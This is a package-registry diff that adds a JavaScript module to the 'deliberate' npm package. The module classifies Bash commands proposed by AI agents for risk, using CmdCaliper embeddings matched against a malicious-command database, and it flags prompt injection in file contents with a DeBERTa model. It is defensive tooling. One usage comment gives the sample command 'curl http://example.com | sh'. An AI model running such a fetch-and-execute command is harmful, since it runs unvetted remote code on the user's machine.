deliberate 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,531 @@
+ /**
+  * Model Classifier - Layer 2 of the classifier
+  *
+  * Uses TWO different models for different purposes:
+  * 1. CmdCaliper (CyCraftAI) - For Bash command classification
+  *    - Generates semantic embeddings for commands
+  *    - Compares to known malicious command database
+  *    - Uses trained RandomForest classifier
+  *
+  * 2. DeBERTa Prompt Injection (ProtectAI) - For file content only
+  *    - Guards against AI-on-AI prompt injection in file contents
+  *    - Only used during Write/Edit operations when reading files
+  *
+  * This layer provides structured, ML-based classification that is harder to bypass
+  * than a raw LLM, but can still be evaded with adversarial inputs.
+  */
+
+ import { pipeline, env } from "@huggingface/transformers";
+ import { readFileSync, existsSync } from 'fs';
+ import { dirname, join } from 'path';
+ import { fileURLToPath } from 'url';
+ import { homedir, platform } from 'os';
+ import { execSync } from 'child_process';
+
+ // Configure Transformers.js for local caching
+ env.cacheDir = process.env.TRANSFORMERS_CACHE || './.cache/transformers';
+ env.allowLocalModels = true;
+
+ // Cross-platform Python command (python3 on Unix, python on Windows)
+ const PYTHON_CMD = platform() === 'win32' ? 'python' : 'python3';
+
+ // Load HuggingFace token from CLI auth or environment and set in env
+ function loadHFToken() {
+   // Try environment variable first
+   if (process.env.HF_TOKEN) {
+     env.accessToken = process.env.HF_TOKEN;
+     return true;
+   }
+   if (process.env.HUGGING_FACE_HUB_TOKEN) {
+     env.accessToken = process.env.HUGGING_FACE_HUB_TOKEN;
+     return true;
+   }
+
+   // Try CLI token locations
+   const tokenPaths = [
+     join(homedir(), '.cache', 'huggingface', 'token'),
+     join(homedir(), '.huggingface', 'token'),
+   ];
+
+   for (const tokenPath of tokenPaths) {
+     if (existsSync(tokenPath)) {
+       try {
+         env.accessToken = readFileSync(tokenPath, 'utf-8').trim();
+         return true;
+       } catch (e) {
+         // Ignore read errors
+       }
+     }
+   }
+
+   return false;
+ }
+
+ const HF_TOKEN_LOADED = loadHFToken();
+
+ // Get the directory of this module for loading model data
+ const __filename = fileURLToPath(import.meta.url);
+ const __dirname = dirname(__filename);
+ const MODELS_DIR = join(__dirname, '..', '..', 'models');
+ const CLASSIFY_SCRIPT = join(__dirname, 'classify_command.py');
+
+ /**
+  * Escape a string for safe use in shell commands
+  * Uses base64 encoding to avoid any shell injection
+  * @param {string} str - String to escape
+  * @returns {string} - Base64 encoded string
+  */
+ function safeShellArg(str) {
+   return Buffer.from(str).toString('base64');
+ }
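+
+ // Example: safeShellArg('echo test') returns 'ZWNobyB0ZXN0'. The callers below pass this
+ // value to classify_command.py via --base64, so the script presumably decodes it itself
+ // and no shell metacharacters from the raw command ever reach the shell.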
+
+ // CmdCaliper model sizes available
+ const CMDCALIPER_MODELS = {
+   small: { size: '128 MB', dim: 384 },
+   base: { size: '419 MB', dim: 768 },
+   large: { size: '1.3 GB', dim: 1024 }
+ };
+
+ // Model configurations
+ const MODELS = {
+   // CmdCaliper model size (small, base, large, or null to disable)
+   // Users can configure this based on their needs:
+   // - small: fastest, smallest, good accuracy
+   // - base: recommended balance of speed and accuracy
+   // - large: best accuracy, larger download
+   // - null: disable ML classification, use pattern matching only
+   commandModel: process.env.DELIBERATE_CMDCALIPER_MODEL || 'base',
+   // DeBERTa for prompt injection detection (file content only)
+   content: {
+     id: "protectai/deberta-v3-base-prompt-injection-v2",
+     type: "text-classification",
+     dtype: "fp32"
+   }
+ };
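+
+ // For example, a host process could select the small model before importing this module
+ // (the script name below is hypothetical):
+ //   DELIBERATE_CMDCALIPER_MODEL=small node agent.js
+ // When the variable is unset, 'base' is used; an unrecognized value also falls back to
+ // 'base' in _classifyWithPython().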
+
+ // Thresholds for risk classification
+ const THRESHOLDS = {
+   command: {
+     // Similarity thresholds for CmdCaliper
+     // Note: CmdCaliper embeddings have moderate similarity even for unrelated commands
+     // These thresholds are calibrated from testing
+     DANGEROUS_SIMILARITY: 0.84, // Very high similarity - near exact match to dangerous
+     MODERATE_SIMILARITY: 0.75, // High similarity - close to known risky patterns
+     // Classifier confidence thresholds (currently unused; reserved for a future classifier)
+     DANGEROUS_CONFIDENCE: 0.75,
+     MODERATE_CONFIDENCE: 0.45
+   },
+   content: {
+     // DeBERTa prompt injection thresholds
+     DANGEROUS: 0.85,
+     MODERATE: 0.5,
+     SAFE: 0.3
+   }
+ };
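+
+ // Worked example: a command whose closest match in the malicious database has cosine
+ // similarity 0.80 falls between MODERATE_SIMILARITY (0.75) and DANGEROUS_SIMILARITY
+ // (0.84), so similarity-based logic using these constants would rate it MODERATE rather
+ // than DANGEROUS.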
+
+ export class ModelClassifier {
+   constructor() {
+     // Models
+     this.commandEmbedder = null;
+     this.contentClassifier = null;
+
+     // Trained data
+     this.maliciousDb = null;
+     this.classifierWeights = null;
+     this.metadata = null;
+
+     // State
+     this.commandReady = false;
+     this.contentReady = false;
+     this.initPromises = {};
+   }
+
+   /**
+    * Load the malicious command embeddings database and classifier
+    * @private
+    */
+   _loadMaliciousDb() {
+     if (this.maliciousDb) return;
+
+     try {
+       const dbPath = join(MODELS_DIR, 'malicious_embeddings.json');
+       const metaPath = join(MODELS_DIR, 'training_metadata.json');
+       const threshPath = join(MODELS_DIR, 'similarity_thresholds.json');
+
+       if (existsSync(dbPath)) {
+         this.maliciousDb = JSON.parse(readFileSync(dbPath, 'utf-8'));
+         console.log('[ModelClassifier] Loaded malicious embeddings database');
+       }
+
+       if (existsSync(metaPath)) {
+         this.metadata = JSON.parse(readFileSync(metaPath, 'utf-8'));
+         console.log(`[ModelClassifier] Loaded metadata: ${this.metadata.num_examples} training examples`);
+       }
+
+       // Note: similarity_thresholds.json contains auto-computed values that are too low
+       // We use manually calibrated thresholds in the THRESHOLDS constant instead
+       // The file is kept for reference but not loaded
+     } catch (error) {
+       console.warn('[ModelClassifier] Could not load malicious database:', error.message);
+     }
+   }
+
+   /**
+    * Initialize the command embedding model (CmdCaliper)
+    * Uses local Python script with sentence-transformers
+    * @returns {Promise<void>}
+    */
+   async initializeCommandModel() {
+     if (this.commandReady) return;
+     if (this.initPromises.command) return this.initPromises.command;
+
+     this.initPromises.command = (async () => {
+       try {
+         const modelSize = MODELS.commandModel || 'base';
+         console.log(`[ModelClassifier] Loading CmdCaliper-${modelSize} model for command analysis...`);
+
+         // Verify Python script exists
+         if (!existsSync(CLASSIFY_SCRIPT)) {
+           throw new Error(`Classification script not found: ${CLASSIFY_SCRIPT}`);
+         }
+
+         // Test that the Python script works by classifying a simple command
+         const testResult = execSync(
+           `${PYTHON_CMD} "${CLASSIFY_SCRIPT}" --base64 "${safeShellArg('echo test')}" --model ${modelSize}`,
+           {
+             encoding: 'utf-8',
+             timeout: 60000 // First run may need to load model
+           }
+         );
+
+         const parsed = JSON.parse(testResult);
+         if (parsed.error) {
+           throw new Error(parsed.error);
+         }
+
+         console.log(`[ModelClassifier] CmdCaliper-${modelSize} + RandomForest loaded successfully`);
+         this.commandReady = true;
+       } catch (error) {
+         console.error('[ModelClassifier] Failed to load CmdCaliper:', error.message);
+         throw error;
+       }
+     })();
+
+     return this.initPromises.command;
+   }
+
+   /**
+    * Initialize the content classification model (DeBERTa)
+    * @returns {Promise<void>}
+    */
+   async initializeContentModel() {
+     if (this.contentReady) return;
+     if (this.initPromises.content) return this.initPromises.content;
+
+     this.initPromises.content = (async () => {
+       try {
+         console.log('[ModelClassifier] Loading DeBERTa model for content analysis...');
+
+         this.contentClassifier = await pipeline(
+           MODELS.content.type,
+           MODELS.content.id,
+           {
+             dtype: MODELS.content.dtype,
+             device: "cpu",
+             progress_callback: (progress) => {
+               if (progress.status === 'downloading') {
+                 const pct = Math.round((progress.loaded / progress.total) * 100);
+                 process.stdout.write(`\r[ModelClassifier] Downloading DeBERTa: ${pct}%`);
+               }
+             }
+           }
+         );
+
+         console.log('\n[ModelClassifier] DeBERTa model loaded successfully');
+         this.contentReady = true;
+       } catch (error) {
+         console.error('[ModelClassifier] Failed to load DeBERTa:', error.message);
+         throw error;
+       }
+     })();
+
+     return this.initPromises.content;
+   }
+
+   /**
+    * Compute cosine similarity between two vectors
+    * @private
+    */
+   _cosineSimilarity(a, b) {
+     let dotProduct = 0;
+     let normA = 0;
+     let normB = 0;
+
+     for (let i = 0; i < a.length; i++) {
+       dotProduct += a[i] * b[i];
+       normA += a[i] * a[i];
+       normB += b[i] * b[i];
+     }
+
+     return dotProduct / (Math.sqrt(normA) * Math.sqrt(normB));
+   }
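+
+   // This implements cos(a, b) = (a . b) / (||a|| * ||b||). For example,
+   // _cosineSimilarity([1, 0], [0, 1]) is 0 (orthogonal) and
+   // _cosineSimilarity([1, 1], [2, 2]) is 1 up to floating-point rounding (same direction);
+   // as noted in THRESHOLDS, real command embeddings rarely score near 0.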
+
+   /**
+    * Find most similar commands in the malicious database
+    * @private
+    */
+   _findSimilarMalicious(embedding) {
+     if (!this.maliciousDb) return null;
+
+     let maxSimilarity = 0;
+     let mostSimilarCommand = null;
+     let matchedCategory = null;
+     let matchedLabel = null;
+
+     for (const label of ['DANGEROUS', 'MODERATE']) {
+       const db = this.maliciousDb[label];
+       if (!db || !db.embeddings) continue;
+
+       for (let i = 0; i < db.embeddings.length; i++) {
+         const similarity = this._cosineSimilarity(embedding, db.embeddings[i]);
+         if (similarity > maxSimilarity) {
+           maxSimilarity = similarity;
+           mostSimilarCommand = db.commands[i];
+           matchedCategory = db.categories[i];
+           matchedLabel = label;
+         }
+       }
+     }
+
+     return {
+       similarity: maxSimilarity,
+       command: mostSimilarCommand,
+       category: matchedCategory,
+       label: matchedLabel
+     };
+   }
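+
+   // The lookups above imply a database shaped roughly like this (inferred from this
+   // file, not from malicious_embeddings.json itself):
+   //   {
+   //     "DANGEROUS": { "commands": [...], "categories": [...], "embeddings": [[...], ...] },
+   //     "MODERATE":  { "commands": [...], "categories": [...], "embeddings": [[...], ...] }
+   //   }
+   // where commands[i], categories[i] and embeddings[i] describe the same training example.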
+
+   /**
+    * Mean pooling for embeddings
+    * @private
+    */
+   _meanPooling(output) {
+     // output.data is a Float32Array, output.dims tells us the shape
+     const [batchSize, seqLen, hiddenSize] = output.dims;
+     const result = new Float32Array(hiddenSize);
+
+     // Average across sequence length
+     for (let i = 0; i < seqLen; i++) {
+       for (let j = 0; j < hiddenSize; j++) {
+         result[j] += output.data[i * hiddenSize + j];
+       }
+     }
+
+     for (let j = 0; j < hiddenSize; j++) {
+       result[j] /= seqLen;
+     }
+
+     return Array.from(result);
+   }
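+
+   // Worked example: for dims [1, 2, 3] and data [1, 2, 3, 4, 5, 6] (two tokens, three
+   // hidden features each) this returns [2.5, 3.5, 4.5]. The flat indexing assumes a
+   // batch size of 1; batchSize is destructured but not used.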
+
+   /**
+    * Classify a command using the Python CmdCaliper + RandomForest script
+    * @private
+    * @param {string} command - The command to classify
+    * @returns {Object} - Classification result from Python
+    */
+   _classifyWithPython(command) {
+     const b64Command = safeShellArg(command);
+
+     // Validate model size to prevent injection
+     const validModels = ['small', 'base', 'large'];
+     const modelSize = validModels.includes(MODELS.commandModel)
+       ? MODELS.commandModel
+       : 'base';
+
+     const result = execSync(
+       `${PYTHON_CMD} "${CLASSIFY_SCRIPT}" --base64 "${b64Command}" --model ${modelSize}`,
+       {
+         encoding: 'utf-8',
+         timeout: 30000, // 30 second timeout (first run loads model)
+         maxBuffer: 1024 * 1024 // 1MB buffer
+       }
+     );
+
+     const parsed = JSON.parse(result);
+     if (parsed.error) {
+       throw new Error(parsed.error);
+     }
+
+     return parsed;
+   }
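+
+   // Based on how classifyCommand() consumes this result, classify_command.py appears
+   // to print a single JSON object roughly like (field names from this file; values and
+   // the inner shape of "probabilities" are illustrative assumptions):
+   //   { "risk": "MODERATE", "confidence": 0.62, "reason": "...", "model_size": "base",
+   //     "probabilities": { "SAFE": 0.30, "MODERATE": 0.62, "DANGEROUS": 0.08 },
+   //     "needs_llm_fallback": false, "coverage_score": 0.81, "nearest_command": "...",
+   //     "nearest_label": "MODERATE", "max_similarity": 0.79 }
+   // or { "error": "..." } on failure.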
+
+   /**
+    * Classify a Bash command using CmdCaliper embeddings + RandomForest
+    *
+    * Active Learning: Returns needsLlmFallback when the classifier is uncertain.
+    * The caller should use LLM verification when this flag is true.
+    *
+    * @param {string} command - The command to classify
+    * @returns {Promise<ClassificationResult>}
+    *
+    * @typedef {Object} ClassificationResult
+    * @property {string} risk - 'SAFE', 'MODERATE', or 'DANGEROUS'
+    * @property {number} score - Confidence score (0-1)
+    * @property {string} reason - Human-readable explanation
+    * @property {string} source - Classification source
+    * @property {boolean} canOverride - Whether user can override
+    * @property {boolean} needsLlmFallback - Whether LLM should verify this
+    * @property {number} coverageScore - How well training data covers this command
+    * @property {string} nearestCommand - Most similar training command
+    * @property {string} nearestLabel - Label of nearest training command
+    */
+   async classifyCommand(command) {
+     // Check if ML classification is disabled
+     if (!MODELS.commandModel) {
+       return {
+         risk: 'SAFE',
+         score: 0.5,
+         reason: 'ML classification disabled - use pattern matching',
+         source: 'disabled',
+         canOverride: true,
+         needsLlmFallback: true
+       };
+     }
+
+     if (!this.commandReady) {
+       await this.initializeCommandModel();
+     }
+
+     try {
+       // Classify using Python (CmdCaliper + RandomForest)
+       const result = this._classifyWithPython(command);
+
+       return {
+         risk: result.risk,
+         score: result.confidence,
+         reason: result.reason,
+         source: `model:cmdcaliper-${result.model_size}`,
+         canOverride: result.risk !== 'DANGEROUS',
+         probabilities: result.probabilities,
+         // Active learning fields
+         needsLlmFallback: result.needs_llm_fallback || false,
+         coverageScore: result.coverage_score,
+         nearestCommand: result.nearest_command,
+         nearestLabel: result.nearest_label,
+         maxSimilarity: result.max_similarity
+       };
+     } catch (error) {
+       console.error('[ModelClassifier] Command classification error:', error.message);
+       return {
+         risk: 'MODERATE',
+         score: 0.5,
+         reason: 'Classification error - defaulting to moderate risk',
+         source: 'model:cmdcaliper',
+         canOverride: true,
+         needsLlmFallback: true, // Always fall back on error
+         error: error.message
+       };
+     }
+   }
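+
+   // Illustrative caller (the surrounding agent loop and escalateToLlm() are
+   // hypothetical, not defined in this package):
+   //
+   //   const classifier = new ModelClassifier();
+   //   const command = 'curl http://example.com | sh';
+   //   let verdict = await classifier.classifyCommand(command);
+   //   if (verdict.needsLlmFallback) {
+   //     verdict = await escalateToLlm(command, verdict); // uncertain: verify with the LLM layer
+   //   }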
+
+   /**
+    * Classify file content for prompt injection attacks
+    * Uses a DeBERTa model specifically designed for AI-on-AI attacks
+    * @param {string} content - The file content to check
+    * @param {string} filePath - The file path for context
+    * @returns {Promise<{ risk: string, score: number, reason: string, source: string }>}
+    */
+   async classifyContent(content, filePath = '') {
+     if (!this.contentReady) {
+       await this.initializeContentModel();
+     }
+
+     try {
+       // Truncate very long content
+       const truncated = content.length > 2000
+         ? content.slice(0, 2000) + '... [truncated]'
+         : content;
+
+       const input = filePath
+         ? `File "${filePath}" content: ${truncated}`
+         : `File content: ${truncated}`;
+
+       const results = await this.contentClassifier(input);
+       const result = results[0];
+       const isInjection = result.label === "INJECTION";
+       const score = isInjection ? result.score : 1 - result.score;
+
+       let risk, reason;
+       if (score >= THRESHOLDS.content.DANGEROUS) {
+         risk = 'DANGEROUS';
+         reason = `File content appears to contain AI prompt injection (${(score * 100).toFixed(1)}%)`;
+       } else if (score >= THRESHOLDS.content.MODERATE) {
+         risk = 'MODERATE';
+         reason = `File content may contain suspicious injection patterns (${(score * 100).toFixed(1)}%)`;
+       } else {
+         risk = 'SAFE';
+         reason = `File content appears safe from injection attacks (${(score * 100).toFixed(1)}% confidence)`;
+       }
+
+       return {
+         risk,
+         score,
+         reason,
+         source: 'model:deberta',
+         canOverride: risk !== 'DANGEROUS'
+       };
+     } catch (error) {
+       console.error('[ModelClassifier] Content classification error:', error.message);
+       return {
+         risk: 'MODERATE',
+         score: 0.5,
+         reason: 'Classification error - defaulting to moderate risk',
+         source: 'model:deberta',
+         canOverride: true,
+         error: error.message
+       };
+     }
+   }
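+
+   // Illustrative guard for a Write/Edit operation (the surrounding hook is hypothetical):
+   //
+   //   const fileText = readFileSync('README.md', 'utf-8');
+   //   const check = await classifier.classifyContent(fileText, 'README.md');
+   //   if (check.risk !== 'SAFE') console.warn(check.reason);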
+
+   /**
+    * Check if models are ready
+    * @returns {{ command: boolean, content: boolean }}
+    */
+   isReady() {
+     return {
+       command: this.commandReady,
+       content: this.contentReady
+     };
+   }
+
+   /**
+    * Get model status for health checks
+    * @returns {Object}
+    */
+   getStatus() {
+     const modelSize = MODELS.commandModel || 'disabled';
+     const modelInfo = CMDCALIPER_MODELS[modelSize] || { size: 'N/A', dim: 0 };
+
+     return {
+       command: {
+         ready: this.commandReady,
+         model: modelSize !== 'disabled' ? `CyCraftAI/CmdCaliper-${modelSize}` : 'disabled',
+         modelSize: modelSize,
+         embeddingDim: modelInfo.dim,
+         downloadSize: modelInfo.size,
+         classifier: 'RandomForest',
+         purpose: 'Bash command classification using ML embeddings'
+       },
+       content: {
+         ready: this.contentReady,
+         model: MODELS.content.id,
+         purpose: 'AI prompt injection detection in file content'
+       },
+       availableModels: CMDCALIPER_MODELS,
+       configEnvVar: 'DELIBERATE_CMDCALIPER_MODEL'
+     };
+   }
+ }
+
+ export default ModelClassifier;
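+
+ // Illustrative end-to-end usage of the default export (the import path is hypothetical
+ // and both initialize*() methods load or download their models on first use):
+ //
+ //   import ModelClassifier from './model-classifier.js';
+ //   const classifier = new ModelClassifier();
+ //   console.log(classifier.getStatus().command.model); // e.g. 'CyCraftAI/CmdCaliper-base'
+ //   await classifier.initializeContentModel();          // fetches DeBERTa via transformers.js
+ //   console.log(classifier.isReady());                  // { command: false, content: true }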